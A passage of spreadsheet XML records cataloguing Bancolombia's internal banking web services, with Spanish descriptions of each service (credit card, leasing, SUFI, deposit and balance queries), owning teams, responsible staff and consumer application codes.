    <s v=" El servicio Consulta Movimientos Tarjeta de Crédito tiene como objetivo realizar las consultas de los Movimientos de las tarjetas de crédito de un cliente de una manera histórica y los últimos 3 días._x005f_x000D_ _x005f_x000D_ El servicio permitirá consultar por el número de la tarjeta de crédito de forma completa, y con los últimos 4 dígitos de la Tarjeta de crédito en el caso de que por seguridad se deba utilizar."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="APIC _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Numeral Cambiario"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Numeral Cambiario permitirá realizar la consulta de los numerales cambiarios a partir de la identificación del cliente, con el tipo de persona y transacción. El proceso para la compra es el siguiente:"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_NU0163001 _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Obligaciones Sufi"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaObligacionesSufi permitirá a los consumidores consultar las Obligaciones que tiene una persona con SUFI. Se nombra y se deja abierto el servicio como “consulta” con el fin de adicionar las capacidades que se requieran para consultas relacionadas con obligaciones como consultarDetalleObligacion etc. "/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Obligacion Sufi_AW1082001"/>
    <s v="AW1209001 _x000d__x000a_ISSU20003 _x000d__x000a_AW1097001 _x000d__x000a_NU0093001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Obligaciones Sufi"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaObligacionesSufi permitirá a los consumidores consultar las Obligaciones que tiene una persona con SUFI."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Obligacion Sufi_AW1082001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Obligaciones Sufi"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaObligacionesSufi permitirá a los consumidores consultar las Obligaciones que tiene una persona con SUFI. Se nombra y se deja abierto el servicio como “consulta” con el fin de adicionar las capacidades que se requieran para consultas relacionadas con obligaciones como consultarDetalleObligacion etc."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="AW1097001 _x000d__x000a_NU0021001 _x000d__x000a_NU0093001 _x000d__x000a_ISSU20003 _x000d__x000a_NU0204001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Operacion Leasing"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio de Consulta Operación Leasing permite a los consumidores obtener la información de las operaciones: Producto, estado, condiciones financieras, condiciones generales de la opción."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Operacion Leasing Financiero"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Operación Leasing Financiero permitirá a los consumidores consultar diferente información relacionada con las operaciones de leasing financiero en estados de anticipo, definitivos o cancelados. "/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <s v="_x000a__x000a_LEASING_AW1171001"/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pago En Efectivo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Pago En Efectivo permitirá obtener información de los pagos, la información podrá ser buscada por pagador o beneficiario, retornando información como tal del pago e información asociada de como se estableció el pago."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1151001 _x000d__x000a_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pago Obligaciones Sufi"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio de tarea ConsultaPagoObligacionesSufi es una composición entre los servicios de datos del cliente y de la consulta básica de obligaciones, que permite obtener los datos necesarios para que un cliente de Sufi pueda consultar los datos de sus próximos pagos a realizar desde una línea telefónica bajo la tecnología de respuesta de voz interactiva (IVR), este servicio de tarea se hace bajo el contexto del proveedor del Konecta."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="ISSU20003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pago Operacion Leasing"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio de Consulta Pago Operación Leasing permite a los consumidores obtener la información de los pagos realizados para una obligación, sean de Leasing Financiero, Leasing Arrendamiento operativo u otro tipo de Leasing."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pago Programado"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="La Consulta Pagos Programado permitirá visualizar el detalle de una pago programado asociado a un pagador, se obtendra información del convenio, su forma de pago, referencias y su programación. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pagos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaPagos tiene el objetivo de realizar la consulta general y detallada del histórico de lotes de pagos, que ha realizado una empresa afiliada a sus beneficiarios (proveedor o empleado)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="AW1170 _x000d__x000a_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pagos Operacion Leasing Financiero"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Pagos Operación Leasing Financiero permitirá a los consumidores consultar los diferentes pagos: al día, pagos anteriores, pagos futuros o en mora para las operaciones en estado definitiva o en anticipo"/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <s v="_x000a__x000a_LEASING_AW1171001"/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Partner Listas De Control"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="La consulta en listas de control para partners, permite a los aliados estratégicos del grupo Bancolombia verificar si un potencial cliente se encuentra reportado en alguna categoría de alerta o bloqueo de listas de control. El consumo de esta capacidad está sujeta previa autorización del equipo jurídico asignado al proyecto que desea consumirlo y siguiendo todo el modelo operativo para APIs partners."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <m/>
    <s v="NU0063001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Plan Pago Operacion Leasing"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio de Consulta Plan de Pago Operación Leasing permite a los consumidores obtener la información de los planes de pagos acordados para una obligación sean de Leasing Financiero, Leasing Arrendamiento operativo u otro tipo de Leasing."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Prestamos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Es un servicio que permite consultar el detalle de un prestamo"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1313001 _x000d__x000a_AW1294001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Producto Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permitirá consultar las cuentas asociadas a un cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Bankvision - BVC_Matriz MIT_ISBVC0009"/>
    <s v="AW1177 _x000d__x000a_AW0937 _x000d__x000a_ELIBOM _x000d__x000a_AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW0638 _x000d__x000a_BSN _x000d__x000a_AW1287 _x000d__x000a_AW1128 _x000d__x000a_AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Producto Tarjetas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permitirá consultar el listado de las tarjetas de crédito de un cliente específico la cual contiene filtros de acuerdo a lo solicitado."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="AW01065 _x000d__x000a_AW1176 _x000d__x000a_BSN _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Productos Cliente Personas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El Servicio permite obtener información detallada de la relación del cliente con sus productos y las personas relacionadas a sus productos(relacionados).   La relación cliente productos devuelve cuales son los productos que un cliente tiene asociado, su porcentaje de participación, la oficina dueña, el tipo de relación que tiene con el producto, etc., agrupado por tipo y número.  Un relacionado es cualquier persona que tenga participación con los productos de un cliente, por ejemplo: un titular, un avalista, un deudor, un cotitular, un beneficiario, etc."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <m/>
    <s v="AW1294001 _x000d__x000a_SVP _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Productos Consolidados"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite a los clientes consultar la información de los siguientes productos: cuentas de depósitos (Ahorros y Corrientes), tarjetas de crédito, préstamos, créditos hipotecarios y CDTs. El nombre de este servicio hace referencia a Productos Consolidados, porque permite al cliente buscar información de casi todos sus productos que se encuentran que tienen en el banco."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="Legacy y MFT"/>
    <s v="Servicios e Integració​​​​​​​​​​​​​​n"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="STI - Sistema Transaccional de Integración_Sistema Transaccional de Integración_ISSTI0002"/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Productos Del Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permitirá la consulta de información de los productos de un cliente de factoring específico, en varios niveles de detalle."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Factoring"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Factoring"/>
    <s v="Lucas Daniel Betancourt"/>
    <m/>
    <s v="Sucursal Virtual_Sucursal Virtual Factoring_AW0422001"/>
    <s v="AW0922 _x000d__x000a_AW0611001 _x000d__x000a_TP _x000d__x000a_Allus _x000d__x000a_AW1294001 _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Productos InvestBot"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Productos InvestBot permite consular las cuentas depósitos, fondos de inversión colectiva (solo para Valores Bancolombia) y cuentas multiproductos activas de un cliente.  "/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Sitio Transaccional_Sitio Transaccional_AW0638001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Productos Pagos Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permitirá consultar las cuentas asociadas a un cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <s v="Bankvision - BVC_Matriz MIT_ISBVC0009"/>
    <s v="BSN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Riesgo Por Cartera"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio de consulta riesgo por cartera estará en capacidad de indicar la calificación de cliente y sus obligaciones catalogadas por tipo de cartera. _x000a_La calificación hace referencia a como se ha evaluado el comportamiento de un cliente en el banco, y las obligaciones, son los el detalle de las deudas o productos que tiene con el banco. "/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Consolidados"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaSaldosConsolidados proporciona a los consumidores, capacidades para realizar las diferentes transacciones no monetarias sobre las cuentas deposito (Ahorro/Corriente) y plazos fijos."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Consolidados Filiales"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Saldos Consolidados Filiales permitirá a los diferentes consumidores poder obtener los saldos consolidados para todos los tipos de productos que posea el cliente en Finacle (CAA: Cuentas corrientes, SBA: Cuenta de ahorros, LAA: Préstamo retail, CLA: Préstamo corporativo y TDA: Plazos fijos) en las diferentes Filiales. El consolidado total de los saldos de todas las Filiales lo tendrá que realizar el consumidor del servicio en caso tal que lo requiera"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Creditos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos LAA: Préstamo retail, CLA: Préstamo corporativo que posee el cliente en las Filiales del exterior. "/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Cuentas Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio tiene como objetivo realizar las consultas de los saldos de las cuentas depósitos (Cuenta Ahorro y Cuenta Corriente) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Filiales del Exterior"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1170 _x000d__x000a_AW1165"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Cuentas Depositos"/>
    <n v="300"/>
    <s v="No Aplica"/>
    <s v="El servicio permite consultar el listado de las cuentas (Cuentas de ahorro y Cuentas Corriente) activas de un cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="FINACLE 10.6_CREDITO HIPOTECARIO_AW1010001"/>
    <s v="NU0017001 _x000d__x000a_AW0856 _x000d__x000a_AW1294001 _x000d__x000a_AW1316001 _x000d__x000a_AW1169 _x000d__x000a_AW1170 _x000d__x000a_NU0014001 _x000d__x000a_AW1165 _x000d__x000a_AW1302001 _x000d__x000a_AW1011 _x000d__x000a_SVE _x000d__x000a_AW1316"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Cuentas Depositos"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio permite consultar el listado de las cuentas (Cuentas de ahorro y Cuentas Corriente) activas de un cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="FINACLE 10.6_CREDITO HIPOTECARIO_AW1010001"/>
    <s v="AW1177 _x000d__x000a_AW0638 _x000d__x000a_BSN _x000d__x000a_AW1269001 _x000d__x000a_AW1272001 _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Cuentas Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos: CAA: Cuentas corrientes, SBA: Cuenta de ahorros que posea el cliente en las Filiales del Exterior. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Filiales del Exterior"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1185001 _x000d__x000a_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Plazos Fijos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este permitirá a los diferentes consumidores poder obtener los diferentes saldos de forma detallada para los tipos de productos TDA: Plazos fijos que posee el cliente en las Filiales del Exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1185001 _x000d__x000a_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Productos Consolidados"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Saldos Productos Consolidados permitirá a los diferentes consumidores poder consultar los saldos consolidados para todos los tipos de productos que posea el cliente en Finacle como (CAA: Cuentas corrientes, SBA: Cuenta de ahorros, LAA: Préstamo retail, CLA: Préstamo corporativo y TDA: Plazos fijos). "/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="SAP CRM_AW0682001"/>
    <s v="AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaTarjetasCredito permite consultar la información de tarjetas de crédito, ya sea asociadas a un cliente o por número de tarjeta, donde se podrá retornar información de estados, bloqueos, saldos, deudas y fechas de la tarjeta."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="AW1285001 _x000d__x000a_AW1294001 _x000d__x000a_AW1316001 _x000d__x000a_AW1272001 _x000d__x000a_AW1165 _x000d__x000a_NU0019001 _x000d__x000a_NU0064001 _x000d__x000a_AW1250 _x000d__x000a_NU0103001 _x000d__x000a_AW1316 _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas Credito"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite realizar diferentes tipos de consultas asociadas a las tarjetas de crédito, los cuales se listan a continuación.  • Listar tarjetas activas de un cliente (CONSTRUCCION) • Consultar datos de un tarjetahabiente (PRODUCCION) • Consultar los planes de pago de una tarjeta (CONSTRUCCION) • Consultar el detalle de una tarjeta (CONSTRUCCION)• Consultar el código de seguridad de una tarjeta (CONSTRUCCION)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="SAP ERP_FI-AP (Accounts Payable)_AW0541001"/>
    <s v="NU0021001 _x000d__x000a_NU0100001 _x000d__x000a_NU0101001 _x000d__x000a_AW1405001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1316001 _x000d__x000a_AW0955001 _x000d__x000a_AW1184 _x000d__x000a_AW1151001 _x000d__x000a_NU0146001 _x000d__x000a_NU0153001 _x000d__x000a_NU0149001 _x000d__x000a_AW1184003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas Debito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite realizar las diferentes consultas relacionadas a una tarjeta débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
